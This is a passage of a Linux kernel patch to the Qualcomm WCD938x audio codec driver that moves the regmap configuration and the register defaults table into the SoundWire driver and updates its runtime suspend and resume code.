++	if (reg == WCD938X_DIGITAL_SWR_TX_CLK_RATE)
++		return true;
++
++	if (wcd938x_readonly_register(dev, reg))
++		return true;
++
++	return false;
++}
++
++static const struct regmap_config wcd938x_regmap_config = {
++	.name = "wcd938x_csr",
++	.reg_bits = 32,
++	.val_bits = 8,
++	.cache_type = REGCACHE_RBTREE,
++	.reg_defaults = wcd938x_defaults,
++	.num_reg_defaults = ARRAY_SIZE(wcd938x_defaults),
++	.max_register = WCD938X_MAX_REGISTER,
++	.readable_reg = wcd938x_readable_register,
++	.writeable_reg = wcd938x_writeable_register,
++	.volatile_reg = wcd938x_volatile_register,
++	.can_multi_write = true,
++};
++
++static const struct sdw_slave_ops wcd9380_slave_ops = {
+ 	.update_status = wcd9380_update_status,
+ 	.interrupt_callback = wcd9380_interrupt_callback,
+ 	.bus_config = wcd9380_bus_config,
+@@ -261,6 +1263,16 @@ static int wcd9380_probe(struct sdw_slave *pdev,
+ 		wcd->ch_info = &wcd938x_sdw_rx_ch_info[0];
+ 	}
+ 
++	if (wcd->is_tx) {
++		wcd->regmap = devm_regmap_init_sdw(pdev, &wcd938x_regmap_config);
++		if (IS_ERR(wcd->regmap))
++			return dev_err_probe(dev, PTR_ERR(wcd->regmap),
++					     "Regmap init failed\n");
++
++		/* Start in cache-only until device is enumerated */
++		regcache_cache_only(wcd->regmap, true);
++	};
++
+ 	pm_runtime_set_autosuspend_delay(dev, 3000);
+ 	pm_runtime_use_autosuspend(dev);
+ 	pm_runtime_mark_last_busy(dev);
+@@ -278,22 +1290,23 @@ MODULE_DEVICE_TABLE(sdw, wcd9380_slave_id);
+ 
+ static int __maybe_unused wcd938x_sdw_runtime_suspend(struct device *dev)
+ {
+-	struct regmap *regmap = dev_get_regmap(dev, NULL);
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);
+ 
+-	if (regmap) {
+-		regcache_cache_only(regmap, true);
+-		regcache_mark_dirty(regmap);
++	if (wcd->regmap) {
++		regcache_cache_only(wcd->regmap, true);
++		regcache_mark_dirty(wcd->regmap);
+ 	}
++
+ 	return 0;
+ }
+ 
+ static int __maybe_unused wcd938x_sdw_runtime_resume(struct device *dev)
+ {
+-	struct regmap *regmap = dev_get_regmap(dev, NULL);
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(dev);
+ 
+-	if (regmap) {
+-		regcache_cache_only(regmap, false);
+-		regcache_sync(regmap);
++	if (wcd->regmap) {
++		regcache_cache_only(wcd->regmap, false);
++		regcache_sync(wcd->regmap);
+ 	}
+ 
+ 	pm_runtime_mark_last_busy(dev);
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index fcac763b04d1b..d34f13758aca0 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -273,1001 +273,6 @@ static struct wcd_mbhc_field wcd_mbhc_fields[WCD_MBHC_REG_FUNC_MAX] = {
+ 	WCD_MBHC_FIELD(WCD_MBHC_ELECT_ISRC_EN, WCD938X_ANA_MBHC_ZDET, 0x02),
+ };
+ 
+-static const struct reg_default wcd938x_defaults[] = {
+-	{WCD938X_ANA_PAGE_REGISTER,                            0x00},
+-	{WCD938X_ANA_BIAS,                                     0x00},
+-	{WCD938X_ANA_RX_SUPPLIES,                              0x00},
+-	{WCD938X_ANA_HPH,                                      0x0C},
+-	{WCD938X_ANA_EAR,                                      0x00},
+-	{WCD938X_ANA_EAR_COMPANDER_CTL,                        0x02},
+-	{WCD938X_ANA_TX_CH1,                                   0x20},
+-	{WCD938X_ANA_TX_CH2,                                   0x00},
+-	{WCD938X_ANA_TX_CH3,                                   0x20},
+-	{WCD938X_ANA_TX_CH4,                                   0x00},
+-	{WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC,                 0x00},
+-	{WCD938X_ANA_MICB3_DSP_EN_LOGIC,                       0x00},
+-	{WCD938X_ANA_MBHC_MECH,                                0x39},
+-	{WCD938X_ANA_MBHC_ELECT,                               0x08},
+-	{WCD938X_ANA_MBHC_ZDET,                                0x00},
+-	{WCD938X_ANA_MBHC_RESULT_1,                            0x00},
+-	{WCD938X_ANA_MBHC_RESULT_2,                            0x00},
+-	{WCD938X_ANA_MBHC_RESULT_3,                            0x00},
+-	{WCD938X_ANA_MBHC_BTN0,                                0x00},
+-	{WCD938X_ANA_MBHC_BTN1,                                0x10},
+-	{WCD938X_ANA_MBHC_BTN2,                                0x20},
+-	{WCD938X_ANA_MBHC_BTN3,                                0x30},
+-	{WCD938X_ANA_MBHC_BTN4,                                0x40},
+-	{WCD938X_ANA_MBHC_BTN5,                                0x50},
+-	{WCD938X_ANA_MBHC_BTN6,                                0x60},
+-	{WCD938X_ANA_MBHC_BTN7,                                0x70},
+-	{WCD938X_ANA_MICB1,                                    0x10},
+-	{WCD938X_ANA_MICB2,                                    0x10},
+-	{WCD938X_ANA_MICB2_RAMP,                               0x00},
+-	{WCD938X_ANA_MICB3,                                    0x10},
+-	{WCD938X_ANA_MICB4,                                    0x10},
+-	{WCD938X_BIAS_CTL,                                     0x2A},
+-	{WCD938X_BIAS_VBG_FINE_ADJ,                            0x55},
+-	{WCD938X_LDOL_VDDCX_ADJUST,                            0x01},
+-	{WCD938X_LDOL_DISABLE_LDOL,                            0x00},
+-	{WCD938X_MBHC_CTL_CLK,                                 0x00},
+-	{WCD938X_MBHC_CTL_ANA,                                 0x00},
+-	{WCD938X_MBHC_CTL_SPARE_1,                             0x00},
+-	{WCD938X_MBHC_CTL_SPARE_2,                             0x00},
+-	{WCD938X_MBHC_CTL_BCS,                                 0x00},
+-	{WCD938X_MBHC_MOISTURE_DET_FSM_STATUS,                 0x00},
+-	{WCD938X_MBHC_TEST_CTL,                                0x00},
+-	{WCD938X_LDOH_MODE,                                    0x2B},
+-	{WCD938X_LDOH_BIAS,                                    0x68},
+-	{WCD938X_LDOH_STB_LOADS,                               0x00},
+-	{WCD938X_LDOH_SLOWRAMP,                                0x50},
+-	{WCD938X_MICB1_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB1_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB1_TEST_CTL_3,                             0xA4},
+-	{WCD938X_MICB2_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB2_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB2_TEST_CTL_3,                             0x24},
+-	{WCD938X_MICB3_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB3_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB3_TEST_CTL_3,                             0xA4},
+-	{WCD938X_MICB4_TEST_CTL_1,                             0x1A},
+-	{WCD938X_MICB4_TEST_CTL_2,                             0x00},
+-	{WCD938X_MICB4_TEST_CTL_3,                             0xA4},
+-	{WCD938X_TX_COM_ADC_VCM,                               0x39},
+-	{WCD938X_TX_COM_BIAS_ATEST,                            0xE0},
+-	{WCD938X_TX_COM_SPARE1,                                0x00},
+-	{WCD938X_TX_COM_SPARE2,                                0x00},
+-	{WCD938X_TX_COM_TXFE_DIV_CTL,                          0x22},
+-	{WCD938X_TX_COM_TXFE_DIV_START,                        0x00},
+-	{WCD938X_TX_COM_SPARE3,                                0x00},
+-	{WCD938X_TX_COM_SPARE4,                                0x00},
+-	{WCD938X_TX_1_2_TEST_EN,                               0xCC},
+-	{WCD938X_TX_1_2_ADC_IB,                                0xE9},
+-	{WCD938X_TX_1_2_ATEST_REFCTL,                          0x0A},
+-	{WCD938X_TX_1_2_TEST_CTL,                              0x38},
+-	{WCD938X_TX_1_2_TEST_BLK_EN1,                          0xFF},
+-	{WCD938X_TX_1_2_TXFE1_CLKDIV,                          0x00},
+-	{WCD938X_TX_1_2_SAR2_ERR,                              0x00},
+-	{WCD938X_TX_1_2_SAR1_ERR,                              0x00},
+-	{WCD938X_TX_3_4_TEST_EN,                               0xCC},
+-	{WCD938X_TX_3_4_ADC_IB,                                0xE9},
+-	{WCD938X_TX_3_4_ATEST_REFCTL,                          0x0A},
+-	{WCD938X_TX_3_4_TEST_CTL,                              0x38},
+-	{WCD938X_TX_3_4_TEST_BLK_EN3,                          0xFF},
+-	{WCD938X_TX_3_4_TXFE3_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SAR4_ERR,                              0x00},
+-	{WCD938X_TX_3_4_SAR3_ERR,                              0x00},
+-	{WCD938X_TX_3_4_TEST_BLK_EN2,                          0xFB},
+-	{WCD938X_TX_3_4_TXFE2_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SPARE1,                                0x00},
+-	{WCD938X_TX_3_4_TEST_BLK_EN4,                          0xFB},
+-	{WCD938X_TX_3_4_TXFE4_CLKDIV,                          0x00},
+-	{WCD938X_TX_3_4_SPARE2,                                0x00},
+-	{WCD938X_CLASSH_MODE_1,                                0x40},
+-	{WCD938X_CLASSH_MODE_2,                                0x3A},
+-	{WCD938X_CLASSH_MODE_3,                                0x00},
+-	{WCD938X_CLASSH_CTRL_VCL_1,                            0x70},
+-	{WCD938X_CLASSH_CTRL_VCL_2,                            0x82},
+-	{WCD938X_CLASSH_CTRL_CCL_1,                            0x31},
+-	{WCD938X_CLASSH_CTRL_CCL_2,                            0x80},
+-	{WCD938X_CLASSH_CTRL_CCL_3,                            0x80},
+-	{WCD938X_CLASSH_CTRL_CCL_4,                            0x51},
+-	{WCD938X_CLASSH_CTRL_CCL_5,                            0x00},
+-	{WCD938X_CLASSH_BUCK_TMUX_A_D,                         0x00},
+-	{WCD938X_CLASSH_BUCK_SW_DRV_CNTL,                      0x77},
+-	{WCD938X_CLASSH_SPARE,                                 0x00},
+-	{WCD938X_FLYBACK_EN,                                   0x4E},
+-	{WCD938X_FLYBACK_VNEG_CTRL_1,                          0x0B},
+-	{WCD938X_FLYBACK_VNEG_CTRL_2,                          0x45},
+-	{WCD938X_FLYBACK_VNEG_CTRL_3,                          0x74},
+-	{WCD938X_FLYBACK_VNEG_CTRL_4,                          0x7F},
+-	{WCD938X_FLYBACK_VNEG_CTRL_5,                          0x83},
+-	{WCD938X_FLYBACK_VNEG_CTRL_6,                          0x98},
+-	{WCD938X_FLYBACK_VNEG_CTRL_7,                          0xA9},
+-	{WCD938X_FLYBACK_VNEG_CTRL_8,                          0x68},
+-	{WCD938X_FLYBACK_VNEG_CTRL_9,                          0x64},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_1,                       0xED},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_2,                       0xF0},
+-	{WCD938X_FLYBACK_VNEGDAC_CTRL_3,                       0xA6},
+-	{WCD938X_FLYBACK_CTRL_1,                               0x65},
+-	{WCD938X_FLYBACK_TEST_CTL,                             0x00},
+-	{WCD938X_RX_AUX_SW_CTL,                                0x00},
+-	{WCD938X_RX_PA_AUX_IN_CONN,                            0x01},
+-	{WCD938X_RX_TIMER_DIV,                                 0x32},
+-	{WCD938X_RX_OCP_CTL,                                   0x1F},
+-	{WCD938X_RX_OCP_COUNT,                                 0x77},
+-	{WCD938X_RX_BIAS_EAR_DAC,                              0xA0},
+-	{WCD938X_RX_BIAS_EAR_AMP,                              0xAA},
+-	{WCD938X_RX_BIAS_HPH_LDO,                              0xA9},
+-	{WCD938X_RX_BIAS_HPH_PA,                               0xAA},
+-	{WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2,                    0x8A},
+-	{WCD938X_RX_BIAS_HPH_RDAC_LDO,                         0x88},
+-	{WCD938X_RX_BIAS_HPH_CNP1,                             0x82},
+-	{WCD938X_RX_BIAS_HPH_LOWPOWER,                         0x82},
+-	{WCD938X_RX_BIAS_AUX_DAC,                              0xA0},
+-	{WCD938X_RX_BIAS_AUX_AMP,                              0xAA},
+-	{WCD938X_RX_BIAS_VNEGDAC_BLEEDER,                      0x50},
+-	{WCD938X_RX_BIAS_MISC,                                 0x00},
+-	{WCD938X_RX_BIAS_BUCK_RST,                             0x08},
+-	{WCD938X_RX_BIAS_BUCK_VREF_ERRAMP,                     0x44},
+-	{WCD938X_RX_BIAS_FLYB_ERRAMP,                          0x40},
+-	{WCD938X_RX_BIAS_FLYB_BUFF,                            0xAA},
+-	{WCD938X_RX_BIAS_FLYB_MID_RST,                         0x14},
+-	{WCD938X_HPH_L_STATUS,                                 0x04},
+-	{WCD938X_HPH_R_STATUS,                                 0x04},
+-	{WCD938X_HPH_CNP_EN,                                   0x80},
+-	{WCD938X_HPH_CNP_WG_CTL,                               0x9A},
+-	{WCD938X_HPH_CNP_WG_TIME,                              0x14},
+-	{WCD938X_HPH_OCP_CTL,                                  0x28},
+-	{WCD938X_HPH_AUTO_CHOP,                                0x16},
+-	{WCD938X_HPH_CHOP_CTL,                                 0x83},
+-	{WCD938X_HPH_PA_CTL1,                                  0x46},
+-	{WCD938X_HPH_PA_CTL2,                                  0x50},
+-	{WCD938X_HPH_L_EN,                                     0x80},
+-	{WCD938X_HPH_L_TEST,                                   0xE0},
+-	{WCD938X_HPH_L_ATEST,                                  0x50},
+-	{WCD938X_HPH_R_EN,                                     0x80},
+-	{WCD938X_HPH_R_TEST,                                   0xE0},
+-	{WCD938X_HPH_R_ATEST,                                  0x54},
+-	{WCD938X_HPH_RDAC_CLK_CTL1,                            0x99},
+-	{WCD938X_HPH_RDAC_CLK_CTL2,                            0x9B},
+-	{WCD938X_HPH_RDAC_LDO_CTL,                             0x33},
+-	{WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL,                     0x00},
+-	{WCD938X_HPH_REFBUFF_UHQA_CTL,                         0x68},
+-	{WCD938X_HPH_REFBUFF_LP_CTL,                           0x0E},
+-	{WCD938X_HPH_L_DAC_CTL,                                0x20},
+-	{WCD938X_HPH_R_DAC_CTL,                                0x20},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL,               0x55},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_EN,                     0x19},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1,                  0xA0},
+-	{WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS,                 0x00},
+-	{WCD938X_EAR_EAR_EN_REG,                               0x22},
+-	{WCD938X_EAR_EAR_PA_CON,                               0x44},
+-	{WCD938X_EAR_EAR_SP_CON,                               0xDB},
+-	{WCD938X_EAR_EAR_DAC_CON,                              0x80},
+-	{WCD938X_EAR_EAR_CNP_FSM_CON,                          0xB2},
+-	{WCD938X_EAR_TEST_CTL,                                 0x00},
+-	{WCD938X_EAR_STATUS_REG_1,                             0x00},
+-	{WCD938X_EAR_STATUS_REG_2,                             0x08},
+-	{WCD938X_ANA_NEW_PAGE_REGISTER,                        0x00},
+-	{WCD938X_HPH_NEW_ANA_HPH2,                             0x00},
+-	{WCD938X_HPH_NEW_ANA_HPH3,                             0x00},
+-	{WCD938X_SLEEP_CTL,                                    0x16},
+-	{WCD938X_SLEEP_WATCHDOG_CTL,                           0x00},
+-	{WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL,                 0x00},
+-	{WCD938X_MBHC_NEW_CTL_1,                               0x02},
+-	{WCD938X_MBHC_NEW_CTL_2,                               0x05},
+-	{WCD938X_MBHC_NEW_PLUG_DETECT_CTL,                     0xE9},
+-	{WCD938X_MBHC_NEW_ZDET_ANA_CTL,                        0x0F},
+-	{WCD938X_MBHC_NEW_ZDET_RAMP_CTL,                       0x00},
+-	{WCD938X_MBHC_NEW_FSM_STATUS,                          0x00},
+-	{WCD938X_MBHC_NEW_ADC_RESULT,                          0x00},
+-	{WCD938X_TX_NEW_AMIC_MUX_CFG,                          0x00},
+-	{WCD938X_AUX_AUXPA,                                    0x00},
+-	{WCD938X_LDORXTX_MODE,                                 0x0C},
+-	{WCD938X_LDORXTX_CONFIG,                               0x10},
+-	{WCD938X_DIE_CRACK_DIE_CRK_DET_EN,                     0x00},
+-	{WCD938X_DIE_CRACK_DIE_CRK_DET_OUT,                    0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL,                    0x40},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L,                   0x81},
+-	{WCD938X_HPH_NEW_INT_RDAC_VREF_CTL,                    0x10},
+-	{WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL,                0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R,                   0x81},
+-	{WCD938X_HPH_NEW_INT_PA_MISC1,                         0x22},
+-	{WCD938X_HPH_NEW_INT_PA_MISC2,                         0x00},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC,                     0x00},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER1,                       0xFE},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER2,                       0x02},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER3,                       0x4E},
+-	{WCD938X_HPH_NEW_INT_HPH_TIMER4,                       0x54},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC2,                    0x00},
+-	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC3,                    0x00},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW,               0x90},
+-	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW,               0x90},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI,              0x62},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP,                 0x01},
+-	{WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP,                   0x11},
+-	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL,            0x57},
+-	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL,       0x01},
+-	{WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT,                0x00},
+-	{WCD938X_MBHC_NEW_INT_SPARE_2,                         0x00},
+-	{WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON,                  0xA8},
+-	{WCD938X_EAR_INT_NEW_CNP_VCM_CON1,                     0x42},
+-	{WCD938X_EAR_INT_NEW_CNP_VCM_CON2,                     0x22},
+-	{WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS,                 0x00},
+-	{WCD938X_AUX_INT_EN_REG,                               0x00},
+-	{WCD938X_AUX_INT_PA_CTRL,                              0x06},
+-	{WCD938X_AUX_INT_SP_CTRL,                              0xD2},
+-	{WCD938X_AUX_INT_DAC_CTRL,                             0x80},
+-	{WCD938X_AUX_INT_CLK_CTRL,                             0x50},
+-	{WCD938X_AUX_INT_TEST_CTRL,                            0x00},
+-	{WCD938X_AUX_INT_STATUS_REG,                           0x00},
+-	{WCD938X_AUX_INT_MISC,                                 0x00},
+-	{WCD938X_LDORXTX_INT_BIAS,                             0x6E},
+-	{WCD938X_LDORXTX_INT_STB_LOADS_DTEST,                  0x50},
+-	{WCD938X_LDORXTX_INT_TEST0,                            0x1C},
+-	{WCD938X_LDORXTX_INT_STARTUP_TIMER,                    0xFF},
+-	{WCD938X_LDORXTX_INT_TEST1,                            0x1F},
+-	{WCD938X_LDORXTX_INT_STATUS,                           0x00},
+-	{WCD938X_SLEEP_INT_WATCHDOG_CTL_1,                     0x0A},
+-	{WCD938X_SLEEP_INT_WATCHDOG_CTL_2,                     0x0A},
+-	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1,               0x02},
+-	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2,               0x60},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2,               0xFF},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1,               0x7F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0,               0x3F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M,          0x1F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M,          0x0F},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1,          0xD7},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0,            0xC8},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP,           0xC6},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1,      0xD5},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0,        0xCA},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP,       0x05},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0,    0xA5},
+-	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP,       0x13},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1,             0x88},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP,            0x42},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L2,                  0xFF},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L1,                  0x64},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L0,                  0x64},
+-	{WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP,                 0x77},
+-	{WCD938X_DIGITAL_PAGE_REGISTER,                        0x00},
+-	{WCD938X_DIGITAL_CHIP_ID0,                             0x00},
+-	{WCD938X_DIGITAL_CHIP_ID1,                             0x00},
+-	{WCD938X_DIGITAL_CHIP_ID2,                             0x0D},
+-	{WCD938X_DIGITAL_CHIP_ID3,                             0x01},
+-	{WCD938X_DIGITAL_SWR_TX_CLK_RATE,                      0x00},
+-	{WCD938X_DIGITAL_CDC_RST_CTL,                          0x03},
+-	{WCD938X_DIGITAL_TOP_CLK_CFG,                          0x00},
+-	{WCD938X_DIGITAL_CDC_ANA_CLK_CTL,                      0x00},
+-	{WCD938X_DIGITAL_CDC_DIG_CLK_CTL,                      0xF0},
+-	{WCD938X_DIGITAL_SWR_RST_EN,                           0x00},
+-	{WCD938X_DIGITAL_CDC_PATH_MODE,                        0x55},
+-	{WCD938X_DIGITAL_CDC_RX_RST,                           0x00},
+-	{WCD938X_DIGITAL_CDC_RX0_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_RX1_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_RX2_CTL,                          0xFC},
+-	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1,                  0x00},
+-	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3,                  0x00},
+-	{WCD938X_DIGITAL_CDC_COMP_CTL_0,                       0x00},
+-	{WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL,                   0x1E},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_0,                     0x00},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_1,                     0x01},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_0,                     0x63},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_1,                     0x04},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_0,                     0xAC},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_1,                     0x04},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_0,                     0x1A},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_1,                     0x03},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_0,                     0xBC},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A6_0,                     0xC7},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_A7_0,                     0xF8},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_0,                      0x47},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_1,                      0x43},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_2,                      0xB1},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_C_3,                      0x17},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R1,                       0x4D},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R2,                       0x29},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R3,                       0x34},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R4,                       0x59},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R5,                       0x66},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R6,                       0x87},
+-	{WCD938X_DIGITAL_CDC_HPH_DSM_R7,                       0x64},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_0,                     0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_1,                     0x01},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_0,                     0x96},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_1,                     0x09},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_0,                     0xAB},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_1,                     0x05},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_0,                     0x1C},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_0,                     0x17},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_1,                     0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A6_0,                     0xAA},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_A7_0,                     0xE3},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_0,                      0x69},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_1,                      0x54},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_2,                      0x02},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_C_3,                      0x15},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R1,                       0xA4},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R2,                       0xB5},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R3,                       0x86},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R4,                       0x85},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R5,                       0xAA},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R6,                       0xE2},
+-	{WCD938X_DIGITAL_CDC_AUX_DSM_R7,                       0x62},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0,                    0x55},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1,                    0xA9},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0,                   0x3D},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1,                   0x2E},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2,                   0x01},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0,                   0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1,                   0xFC},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2,                   0x01},
+-	{WCD938X_DIGITAL_CDC_HPH_GAIN_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_AUX_GAIN_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_EAR_PATH_CTL,                     0x00},
+-	{WCD938X_DIGITAL_CDC_SWR_CLH,                          0x00},
+-	{WCD938X_DIGITAL_SWR_CLH_BYP,                          0x00},
+-	{WCD938X_DIGITAL_CDC_TX0_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX1_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX2_CTL,                          0x68},
+-	{WCD938X_DIGITAL_CDC_TX_RST,                           0x00},
+-	{WCD938X_DIGITAL_CDC_REQ_CTL,                          0x01},
+-	{WCD938X_DIGITAL_CDC_RST,                              0x00},
+-	{WCD938X_DIGITAL_CDC_AMIC_CTL,                         0x0F},
+-	{WCD938X_DIGITAL_CDC_DMIC_CTL,                         0x04},
+-	{WCD938X_DIGITAL_CDC_DMIC1_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC2_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC3_CTL,                        0x01},
+-	{WCD938X_DIGITAL_CDC_DMIC4_CTL,                        0x01},
+-	{WCD938X_DIGITAL_EFUSE_PRG_CTL,                        0x00},
+-	{WCD938X_DIGITAL_EFUSE_CTL,                            0x2B},
+-	{WCD938X_DIGITAL_CDC_DMIC_RATE_1_2,                    0x11},
+-	{WCD938X_DIGITAL_CDC_DMIC_RATE_3_4,                    0x11},
+-	{WCD938X_DIGITAL_PDM_WD_CTL0,                          0x00},
+-	{WCD938X_DIGITAL_PDM_WD_CTL1,                          0x00},
+-	{WCD938X_DIGITAL_PDM_WD_CTL2,                          0x00},
+-	{WCD938X_DIGITAL_INTR_MODE,                            0x00},
+-	{WCD938X_DIGITAL_INTR_MASK_0,                          0xFF},
+-	{WCD938X_DIGITAL_INTR_MASK_1,                          0xFF},
+-	{WCD938X_DIGITAL_INTR_MASK_2,                          0x3F},
+-	{WCD938X_DIGITAL_INTR_STATUS_0,                        0x00},
+-	{WCD938X_DIGITAL_INTR_STATUS_1,                        0x00},
+-	{WCD938X_DIGITAL_INTR_STATUS_2,                        0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_0,                         0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_1,                         0x00},
+-	{WCD938X_DIGITAL_INTR_CLEAR_2,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_0,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_1,                         0x00},
+-	{WCD938X_DIGITAL_INTR_LEVEL_2,                         0x00},
